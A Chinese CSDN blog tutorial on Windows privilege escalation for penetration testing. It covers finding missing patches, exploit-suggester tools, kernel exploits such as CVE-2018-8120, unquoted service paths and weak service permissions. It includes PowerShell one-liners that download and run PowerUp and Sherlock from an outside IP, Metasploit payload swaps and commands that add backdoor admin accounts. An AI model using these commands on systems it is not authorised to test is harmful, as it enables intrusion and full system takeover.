Windows提权方法

最新推荐文章于 2024-05-11 21:14:45 发布
最新推荐文章于 2024-05-11 21:14:45 发布
阅读量6k 收藏 89
点赞数 7
分类专栏: 内网渗透
原文链接:https://blog.csdn.net/qq_45521281/article/details/113920096?spm=1001.2014.3001.5501
版权

目录

前言

在Windows中,有User、Administrator、System、TrustedInstaller这四种用户权限,其权限从左到右依次升高。而我们在一般的实战中,获得的权限较低,低权限将使渗透测试受到很多的限制。这就要求我们将当前权限提升到足以满足我们要求的高权限。
权限提升的方式大概有以下两类:

  • 纵向提权:低权限用户获得高权限角色的权限。
  • 横向提权:获得同级别角色的权限。

常用的提权方法有Windows系统内核溢出漏洞提权、错误的系统配置提权、数据库提权等等。

Windows系统内核溢出漏洞提权

溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。

利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关键是目标系统有没有及时安装补丁,如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序,溢出Administrator权限。

1. 手动查找系统潜在漏洞

获取目标主机的一个普通用户的shell后,执行如下命令,查看目标系统上安装了那些补丁:

systeminfo
或
wmic qfe get caption,description,hotfixid,installedon

在这里插入图片描述

在这里插入图片描述

可以看到系统就装了这几个补丁。攻击者会通过没有列出的补丁号,寻找相应的提权EXP,例如KiTrap0D和KB979682对应、MS10-021和KB979683对应等等。

然后使用目标机上没有的安装的补丁号对应的EXP进行提权。Windows不同系统提权的漏洞和相应的补丁请见:
https://github.com/SecWiki/windows-kernel-exploits#%E6%BC%8F%E6%B4%9E%E5%88%97%E8%A1%A8

2. 自动查找系统潜在漏洞

Windows Exploit Suggester

下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester

该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而且其只需要我们给出目标系统的信息即可。

使用如下:

首先更新漏洞数据库,会生成一个xls的文件,如下 2020-08-20-mssb.xls

python2 windows-exploit-suggester.py --update

在这里插入图片描述
然后执行如下命令,查看目标主机系统信息,保存为sysinfo.txt文件:

systeminfo > sysinfo.txt

最后,运行如下命令,查看该系统是否存在可利用的提权漏洞:

python2 windows-exploit-suggester.py -d 2020-08-20-mssb.xls -i sysinfo.txt

在这里插入图片描述
如图给出存在可利用的漏洞!!

local_exploit_suggester 模块

Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。

使用如下,假设我们已经获得了目标主机的一个session:

use post/multi/recon/local_exploit_suggester 
set session 1
exploit

在这里插入图片描述
如上图,该模块快速识别并列出了系统中可能被利用的漏洞,十分方便。但虽然如此,也并非所有列出的local exploits都可用。

enum_patches 模块

会用metasploit中的post/windows/gather/enum_patches模块可以根据漏洞编号快速找出系统中缺少的补丁。使用如下:

use post/windows/gather/enum_patches
set session 1
exploit

在实际的查找潜在漏洞的过程中,建议手动和自动双管齐下。

下载地址:https://github.com/rasta-mouse/Sherlock

该脚本可以快速的查找出可能用于本地权限提升的漏洞。使用如下:

powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/Sherlock.ps1');      // 远程执行
Import-Module 目录\Sherlock.ps1       本地执行

Find-AllVulns    // 调用脚本后,执行搜索命令

在这里插入图片描述

3. 选择漏洞并利用

查找了目标机器上的补丁并确定存在漏洞后,我们就可以像目标机器上传本地溢出程序,并执行。这里,我们选择的是CVE-2018-8120。

漏洞利用程序可以从以下几个地址中下载:(里面附有使用说明)

在这里插入图片描述
执行:

在这里插入图片描述
执行提权程序之前,为普通用户whoami权限,执行后为system权限。

完整操作:

在这里插入图片描述

Windows系统错误配置漏洞提权

在Windows系统中,攻击者通常会通过系统内核溢出漏洞来提权,但是如果碰到无法通过系统内核溢出漏洞提权的情况时,会可以利用系统中的错误配置漏洞来提权。下面演示几种常见的Windows系统错误配置漏洞提权方法。

Trusted Service Paths漏洞(可信任服务路径漏洞)

Trusted Service Paths 漏洞是由系统中的“CreateProcess”函数引起的,并利用了windows文件路径解析的特性。

首先,我们来认识一下Windows中文件路径解析的特性。例如,我们有一个文件路径为“C:\Program Files\Some Folder\Service.exe”。那么,对于该路径中的每一个空格,Windows都会尝试寻找并执行与空格前面的名字相匹配的程序。如上面的目录为例,Windows会依次尝试确定和执行一下程序:

 1. C:\Program.exe
 2. C:\Program Files\Some.exe
 3. C:\Program Files\Some Folder\Service.exe

可见,最后才确定并执行真正的程序Service.exe。而由于Windows服务通常是以system权限运行的,所以系统在解析服务所对应的文件路径中的空格时,也会以system系统权限进行,那么,如果我们将一个“适当命名”的可执行程序上传到以上所说的受影响的目录中,服务一旦启动或重启,该程序就会以system权限运行了,可见该漏洞利用了服务路径的文件/文件夹的权限。

该漏洞是由于一个服务的可执行文件没有正确的处理所引用的完整路径名,即一个服务的可执行文件的完整路径中含有空格且没有被双引号引起来,那么该服务就存在这个漏洞。下面演示该漏洞利用方法。

首先,我们可以用以下命令列出目标主机中所有存在空格且没有被引号括起来服务路径:

wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """

在这里插入图片描述

如上图,可以看到“whoami”和“Bunny”这两个服务对应的二进制文件路径没有引号包含起来,并且路径中包含空格。是存在该漏洞的,但在上传可执行文件进去之前,我们需要确定我们对目标文件夹是否有写入的权限。

这里我们使用Windows中的icacls命令,依次来检查“C:\”、“C:\Program Files\Program Folder”等目录的权限发现只有“C:\Program Files\program folder”目录有Everyone(OI)(CI)(F):

参数说明:

“M”表示修改
“F”代表完全控制
“CI”代表从属容器将继承访问控制项
“OI”代表从属文件将继承访问控制项。
这就意味着对该目录有读,写,删除其下的文件,删除该目录下的子目录的权限。

在这里插入图片描述
确认目标机器中存在此漏洞后,把要上传的程序重命名并放置在存在此漏洞且可写的目录下,执行如下命令,尝试重启服务。

sc stop <service_name>
sc start <service_name>

既然要重启服务,那么我们就可以知道,该提权方法需要管理员权限,重启服务的方法适用于从管理员权限到system的权限提升过程。而实际情况下,我们直接对目标主机执行“shutdown -r -t 0”命令让他重启就行了。

我们生成一个msf马并重命名为Hello.exe上传到该“C:\Program Files\Program Folder”目录下,然后分别执行如下命令重启该WhoamiTest服务:

sc stop WhomaiTest
sc start WhomaiTest

在这里插入图片描述
可知提权前为管理员权限(liukaifeng01),提权成功后我们得到一个system权限的session。

这里要注意,新反弹得到的meterpreter会很快就中断了,这是因为当一个进程在Windows中启动后,必须与服务控制管理进行通信,如果没有通信,服务控制管理器会认为出现了错误,进而终止这个进程。所以,我们要在终止载荷进程之前将它迁移到其他进程中,使用msf的“set AutoRunScript migrate -f”命令即可实现自动迁移进程:

在这里插入图片描述
该提权方法在metasploit中对应的模块为:exploit/windows/local/unquoted_service_path,使用如下:

(在之前的metasploit中为exploit/windows/local/trusted_service_path,但在新版的metasploit中替换替换成了exploit/windows/local/unquoted_service_path

use exploit/windows/local/unquoted_service_path
set session 1set AutoRunScript migrate -fexploit

在这里插入图片描述
如上图,提权成功。

系统服务错误权限配置漏洞

Windows 系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。因此,如果一个低权限的用户对此系统服务调用的可执行文件拥有写权限,就可以将该文件替换成任意可执行文件,并随着系统服务的启动获得系统权限。Windows 服务是以System权限运行的,因此,其文件、文件夹和注册表键值都是受强访问控制机制保护的。但是,在某些情况下,操作系统中仍然存在一些没有得到有效保护的服务。

该漏洞利用有以下两种情况:

  • 服务未运行:攻击者会使用任意服务直接替换原来的服务,然后重启服务。
  • 服务正在运行且无法终止:这种情况符合绝大多数漏洞利用的场景,攻击者通常会利用DLL劫持技术并尝试重启服务来提权。

利用PowerUp.ps1脚本

下载地址:https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

这里我们利用一个Powershell的脚本——PowerUp,该脚本的AllChecks模块会检测目标主机存的Windows服务漏洞,然后通过直接替换可执行文件本身来实现权限的提升。

AllChecks模块的通常应用对象如下:

  • 没有被引号引起来的服务的路径。
  • 服务的可执行文件的权限设置不当
  • Unattend.xml文件
  • 注册表键AlwaysInstallElevated
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/PowerUp.ps1');Invoke-ALLChecks"

在这里插入图片描述
如上图,可以看到PowerUp列出了所有可能存在该漏洞的服务的信息,并在AbuseFunction部分直接给出了利用方式。我们可以看到,目标主机的WhoamiTest服务可能存在该漏洞,然后我们再用icacls命令来测试该服务的可执行文件目录的“C:\Program Files\Program Folder\Hello Whoami\whoami.exe”文件是否有写入权限:

icacls "C:\Program Files\Program Folder\Hello Whoami\whoami.exe"

在这里插入图片描述
如上图,可以看到我们对whoami.exe文件是有完全控制权的,那么我们就可以直接将whoami.exe替换成我们的msf马,当服务重启时,我们就会得到一个System权限的meterpreter。

这里,我们用“AbuseFunction”那里已经给出的具体操作方式,执行如下。

将原来的服务可执行文件备份,并用一个可添加管理员用户的恶意可执行文件代替它,默认添加的用户名为join,密码为Password123!:

powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/PowerUp.ps1');Install-ServiceBinary -ServiceName 服务名

在这里插入图片描述
接下来停止并再启动该服务的时候,但由于我们当前是普通用户,我们没有权限重启服务,所以我们可以等目标系统重启,我们通过msf控制目标机执行“shutdown -r”命令来重启,重启后即可成功创建join用户:

在这里插入图片描述
添加指定的管理员用户:

Install-ServiceBinary -ServiceName 服务名 -UserName Bunny -Password Liufupeng123

在这里插入图片描述

Metasploit中的service_permissions模块

该漏洞提权在metasploit上面对应的模块为exploit/windows/local/service_permissions

在这里插入图片描述
如上图,该模块有两个可以设置的选项,其中如果把AGGRESSIVE选项设为“true”,则可以利用目标机器上每一个有该漏洞的服务,设为“false”则在第一次提权成功后就会停止工作。演示如下:

在这里插入图片描述
注:一定要迁移进程!!!!!

她总是阴雨天
关注
  • 7
    点赞
  • 89
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows常见的几种提权方法
hackzkaq的博客
05-20 1万+
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限 在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。 这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。 1.补丁查询法 简介 补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的
windows 进程降权和提权代码示例
jangdong的专栏
05-27 1761
#include "windows.h" BOOL GetTokenByName(HANDLE &hToken,LPTSTR lpName) { if(!lpName) { return FALSE; } HANDLE hProcessSnap = NULL; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, .
2024年网络安全最全Windows提权方法简单总结_systminfo ,根据系统补丁提权(2),程序员进阶
最新发布
2401_84300255的博客
05-11 533
写了好多天的windows与linux提权技巧,现在做下简单的总结。提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
Kotlin 实现动态获权的两种方式?
yyxhzdm的博客
09-21 814
一、自定义 1.在项目的BaseActivity添加代码 /** * 动态获权 * */ /** * 动态获权请求值 */ private var REQUEST_CODE_PERMISSION = 0x00099 protected val TAG = this.javaClass.simpleName /** * 请求权限 * 动态获权 * @param permissions 请求的权限 * @param requestCode 请求权限的请求码 */ open fun re
Windows权限提升
Williamanddog的博客
02-07 2348
kiwi_cmd可以使用mimikatz的全部功能,比如kiwi_cmd sekurlsa::logonpasswords获取明文密码。run post/multi/recon/local_exploit_suggester查询哪些提权exp可以用。systeminfo查看系统补丁:一般的,如果网站安全做好的的情况下,会有几百个补丁。tasklist 查看当前运行的进程,是否有av,可利用的第三方的服务提权等。systeminfo 查看服务器信息及相应的补丁,可找相应的补丁提权
系统提权之:Windows 提权
f_carey的博客
11-04 1303
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
windows账户提权 API.zip
01-22
总的来说,这个压缩包中的资源详细介绍了Windows环境下使用API进行账户提权的各种技术和策略,涵盖了从创建高权限进程到修改系统服务和注册表等多方面。这些技术在系统管理和软件开发中有其应用,但滥用可能会导致...
windows提权工具
01-15
可以对win2K3-win2012 server进行提权 win7也可以,win10没试过
windows提权
qq_58000413的博客
05-19 1717
1、提权介绍权限提升:攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获取对整个系统的控制权2、提权分类本地提权:在一个地权限用户下,通过一些条件(应用程序漏洞、系统漏洞等)直接提升到系统最高权限。远程提权:攻击者通过漏洞利用程序直接获取远程服务器的权限操作系统提权windows:ms06-067、ms10-084、ms11-014、ms11-05等等linux:cve-2017-7308、cve-2017-6074、cve-2017-5123等等。
Windows本地提权 · 上篇
qq_61553520的博客
05-31 1636
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权
第四章——权限提升分析及防御
willow_liang的博客
12-24 2469
第4章权限提升分析及防御 在 Windows中,权限大概分为四种、分别是User、Administrator、System、TrustedInstaller。在这四种权限中,我们经常接触的是前三种。第四种权限 TrustedInstaller,在常规使用中通常不会涉及。 User:普通用户权限,是系统中最安全的权限(因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料)。 Administrator:管理员权限。可以利用Windows 的机制将自己提升为Svstem权限,以便操作SAM文件等。
Windows提权总结
谢公子的博客
02-21 8769
目录 系统溢出漏洞提权 本地溢出提权 实战MSF中CVE-2018-8120模块本地溢出漏洞提权 数据库提权 MySQL提权 SQL Server提权 第三方软件提权 FTP提权 实战假冒令牌(token)提权(域环境中) BypassUAC提权 我们获得了一个Windows系统的普通用户权限,由于低权限用户的很多操作将受到限制。所以,我们会想法设法地将低权限用户提权到高权...
Windows提权方法简单总结_systminfo ,根据系统补丁提权
2401_84296945的博客
04-26 678
写了好多天的windows与linux提权技巧,现在做下简单的总结。提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
热门推荐
fendo
03-29 2万+
一、 二、Windwos常见提权
windows简单注入winlogin提权到System
qq_31314583的博客
03-22 1209
简述 在windows系统中大多数用户能获得的administrator用户的管理员权限即为最高了,但这并非最高权限。而如果能提升权限至system,那岂不是美滋滋。而本文即公布一种十分简洁方便的办法提升权限。 方法 有各种方法,很多都是复制token什么的。其实还有个办法,十分简单。直接使用system进程启动的子进程也会继承父进程的权限。但绝大多数system进程都无法在r3显示。但唯独有一个进程可以,那就是winlogin进程。而且该进程也能在r3打开。因此我们可...
权限提升-windows内核溢出漏洞提权
weixin_39430198的博客
03-14 1668
一、课时目标 1、理解权限提升的原理和目的 2、掌握常规提权的思路和方法 二、权限提升 2.1 什么是提权 提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。 2.2 为什么要提权 用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更
利用msf发现缺失的补丁
技术超强的网络安全平台
09-12 327
利用msf发现缺失的补丁 use post/windows/gather/enum_patches
windows 提权
08-27
Windows提权是指获取管理员权限或系统级权限的过程。在某些情况下,普通用户需要提升权限以执行某些操作或访问受限资源。 有几种常见的Windows提权方法,包括: 1. 利用已知漏洞:Windows系统中可能存在一些未修补的漏洞,黑客可以利用这些漏洞来获取系统权限。 2. 利用可信任的二进制文件:有些系统工具或第三方软件可能使用管理员权限运行,黑客可以利用这些工具或软件中的漏洞来提权。 3. 利用服务:Windows系统中运行着多个服务,其中一些可能存在安全问题。黑客可以通过攻击这些服务来提权。 4. 利用注册表设置:有些注册表设置可以导致Windows系统在启动时以管理员权限运行恶意代码。 需要注意的是,提权行为属于非法活动,违反了计算机安全法律法规。在使用任何提权方法之前,请确保你拥有合法的授权,并遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值